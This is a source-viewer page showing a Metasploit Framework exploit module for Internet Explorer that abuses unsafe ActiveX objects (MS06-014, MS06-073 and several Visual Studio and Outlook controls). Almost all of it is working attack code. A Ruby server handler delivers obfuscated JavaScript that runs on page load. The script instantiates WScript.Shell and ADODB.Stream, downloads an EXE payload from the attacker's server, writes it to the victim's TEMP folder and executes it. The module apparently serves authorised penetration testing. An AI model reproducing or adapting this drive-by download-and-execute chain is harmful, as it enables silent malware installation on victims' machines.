root / modules / exploits / windows / browser / ie_createobject.rb @ master
History | View | Annotate | Download (7.7 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = ExcellentRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::HttpServer::HTML |
| 18 |
include Msf::Exploit::Seh |
| 19 |
include Msf::Exploit::EXE |
| 20 |
|
| 21 |
include Msf::Exploit::Remote::BrowserAutopwn |
| 22 |
autopwn_info({
|
| 23 |
:ua_name => HttpClients::IE, |
| 24 |
# In badly misconfigured situations, IE7 and 8 could be vulnerable to
|
| 25 |
# this, but by default they throw an ugly popup that stops all script
|
| 26 |
# execution until the user deals with it and aborts everything if they
|
| 27 |
# click "no". Not worth the risk of being unable to try more recent
|
| 28 |
# exploits. Make sure service packs on top of 6.0 are considered less
|
| 29 |
# than the max by setting to 6.1 (which doesn't really exist).
|
| 30 |
:ua_maxver => "6.1", |
| 31 |
:javascript => true, |
| 32 |
:os_name => OperatingSystems::WINDOWS, |
| 33 |
:method => [ 'CreateObject', 'GetObject' ], |
| 34 |
:classid =>
|
| 35 |
[ |
| 36 |
'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
|
| 37 |
'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
|
| 38 |
'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
|
| 39 |
'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
|
| 40 |
'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
|
| 41 |
'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
|
| 42 |
'{639F725F-1B2D-4831-A9FD-874847682010}',
|
| 43 |
'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
|
| 44 |
'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
|
| 45 |
'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
|
| 46 |
'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
|
| 47 |
'{0006F033-0000-0000-C000-000000000046}',
|
| 48 |
'{0006F03A-0000-0000-C000-000000000046}',
|
| 49 |
], |
| 50 |
#:rank => ExcellentRanking # reliable exe writer
|
| 51 |
}) |
| 52 |
|
| 53 |
def initialize(info = {}) |
| 54 |
super(update_info(info,
|
| 55 |
'Name' => 'Internet Explorer COM CreateObject Code Execution', |
| 56 |
'Description' => %q{ |
| 57 |
This module exploits a generic code execution vulnerability in Internet |
| 58 |
Explorer by abusing vulnerable ActiveX objects. |
| 59 |
},
|
| 60 |
'License' => MSF_LICENSE, |
| 61 |
'Author' =>
|
| 62 |
[ |
| 63 |
'hdm',
|
| 64 |
], |
| 65 |
'Version' => '$Revision$', |
| 66 |
'References' =>
|
| 67 |
[ |
| 68 |
# MDAC
|
| 69 |
[ 'MSB', 'MS06-014' ], |
| 70 |
[ 'CVE', '2006-0003' ], |
| 71 |
[ 'OSVDB', '24517' ], |
| 72 |
# WMI Object Broker
|
| 73 |
[ 'MSB', 'MS06-073' ], |
| 74 |
[ 'CVE', '2006-4704' ], |
| 75 |
[ 'OSVDB', '30155' ], |
| 76 |
], |
| 77 |
'Payload' =>
|
| 78 |
{
|
| 79 |
'Space' => 2048, |
| 80 |
'StackAdjustment' => -3500, |
| 81 |
}, |
| 82 |
'Platform' => 'win', |
| 83 |
'Targets' =>
|
| 84 |
[ |
| 85 |
[ 'Automatic', { } ],
|
| 86 |
|
| 87 |
# Patched
|
| 88 |
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ], |
| 89 |
# Found in mpack
|
| 90 |
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ], |
| 91 |
|
| 92 |
# Patched
|
| 93 |
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ], |
| 94 |
|
| 95 |
# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
|
| 96 |
[ 'UNKNOWN - SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ], |
| 97 |
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ], |
| 98 |
|
| 99 |
# Visual Studio components, not marked as safe
|
| 100 |
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ], |
| 101 |
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ], |
| 102 |
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ], |
| 103 |
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ], |
| 104 |
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ], |
| 105 |
|
| 106 |
#
|
| 107 |
# The controls below can launch the "installing component" dialogs...
|
| 108 |
#
|
| 109 |
|
| 110 |
# Not marked as safe
|
| 111 |
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ], |
| 112 |
|
| 113 |
# Not marked as safe
|
| 114 |
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ], |
| 115 |
|
| 116 |
# Found exploitable in the wild (no details)
|
| 117 |
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ], |
| 118 |
|
| 119 |
], |
| 120 |
'DefaultTarget' => 0, |
| 121 |
'DisclosureDate' => 'Apr 11 2006')) |
| 122 |
end
|
| 123 |
|
| 124 |
def on_request_uri(cli, request) |
| 125 |
|
| 126 |
if (request.uri.match(/payload/)) |
| 127 |
return if ((p = regenerate_payload(cli)) == nil) |
| 128 |
data = generate_payload_exe({ :code => p.encoded })
|
| 129 |
print_status("Sending EXE payload")
|
| 130 |
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
| 131 |
return
|
| 132 |
end
|
| 133 |
|
| 134 |
# Build out the HTML response page
|
| 135 |
var_html = rand_text_alpha(rand(30)+2) |
| 136 |
var_func_exploit = rand_text_alpha(rand(30)+2); |
| 137 |
var_func_go = rand_text_alpha(rand(30)+2); |
| 138 |
var_func_createo = rand_text_alpha(rand(30)+2); |
| 139 |
var_exe_name = rand_text_alpha(rand(30)+2); |
| 140 |
var_objects = ''
|
| 141 |
|
| 142 |
# Build the object list based on target selection
|
| 143 |
if (target.name == 'Automatic') |
| 144 |
targets.each do |t|
|
| 145 |
next if not t['CLSID'] |
| 146 |
var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," |
| 147 |
end
|
| 148 |
else
|
| 149 |
var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + "," |
| 150 |
end
|
| 151 |
|
| 152 |
|
| 153 |
content = %Q^
|
| 154 |
<html><head><title></title> |
| 155 |
<script language="javascript"> |
| 156 |
|
| 157 |
function #{var_func_createo}( o , n ) { |
| 158 |
var r = null; |
| 159 |
|
| 160 |
try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}
|
| 161 |
|
| 162 |
if (! r) {
|
| 163 |
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
|
| 164 |
} |
| 165 |
|
| 166 |
if (! r) {
|
| 167 |
try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
|
| 168 |
} |
| 169 |
|
| 170 |
if (! r) {
|
| 171 |
try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
|
| 172 |
} |
| 173 |
|
| 174 |
if (! r) {
|
| 175 |
try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
|
| 176 |
} |
| 177 |
|
| 178 |
if (! r) {
|
| 179 |
try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
|
| 180 |
} |
| 181 |
|
| 182 |
return( r ); |
| 183 |
} |
| 184 |
|
| 185 |
function #{var_func_go}( a ) { |
| 186 |
|
| 187 |
var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ); |
| 188 |
|
| 189 |
var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" ); |
| 190 |
|
| 191 |
var e = s.Environment( "P" + "ro" + "ce" + "ss" ); |
| 192 |
|
| 193 |
|
| 194 |
var url = document.location + '/p' + 'ay' + 'lo' + 'ad'; |
| 195 |
var xml = null; |
| 196 |
var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe"; |
| 197 |
var dat; |
| 198 |
|
| 199 |
try { xml=new XMLHttpRequest(); }
|
| 200 |
catch(e) {
|
| 201 |
try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
|
| 202 |
catch(e) {
|
| 203 |
xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
|
| 204 |
} |
| 205 |
} |
| 206 |
|
| 207 |
if (! xml) {
|
| 208 |
return(0); |
| 209 |
} |
| 210 |
|
| 211 |
xml.open("GET", url, false);
|
| 212 |
xml.send(null); |
| 213 |
dat = xml.responseBody; |
| 214 |
|
| 215 |
o.Type = 1 ; |
| 216 |
o.Mode = 3 ; |
| 217 |
o.Open ( ) ; |
| 218 |
o.Write ( dat ) ; |
| 219 |
o.SaveToFile ( bin, 2) ; |
| 220 |
|
| 221 |
s.Run ( bin , 0 ); |
| 222 |
} |
| 223 |
|
| 224 |
function #{var_func_exploit}( ) { |
| 225 |
var i = 0; |
| 226 |
var t = new Array( #{var_objects} null ); |
| 227 |
|
| 228 |
while (t[i]) {
|
| 229 |
var a = null; |
| 230 |
|
| 231 |
if (t[i].substring(0,1) == '{') {
|
| 232 |
a = document.createElement("object");
|
| 233 |
a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
|
| 234 |
} else {
|
| 235 |
try { a = new ActiveXObject(t[i]); } catch(e){}
|
| 236 |
} |
| 237 |
|
| 238 |
if (a) {
|
| 239 |
try {
|
| 240 |
var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ; |
| 241 |
if (b) {
|
| 242 |
#{var_func_go}( a ) ; |
| 243 |
return(0) ; |
| 244 |
} |
| 245 |
} catch(e){
|
| 246 |
} |
| 247 |
} |
| 248 |
i++; |
| 249 |
} |
| 250 |
} |
| 251 |
</script> |
| 252 |
</head> |
| 253 |
<body onload='#{var_func_exploit}()'> |
| 254 |
#{var_html} |
| 255 |
</body> |
| 256 |
</html> |
| 257 |
|
| 258 |
^
|
| 259 |
|
| 260 |
|
| 261 |
content = Rex::Text.randomize_space(content) |
| 262 |
|
| 263 |
print_status("Sending exploit HTML...")
|
| 264 |
|
| 265 |
|
| 266 |
# Transmit the response to the client
|
| 267 |
send_response_html(cli, content) |
| 268 |
|
| 269 |
# Handle the payload
|
| 270 |
handler(cli) |
| 271 |
end
|
| 272 |
|
| 273 |
end
|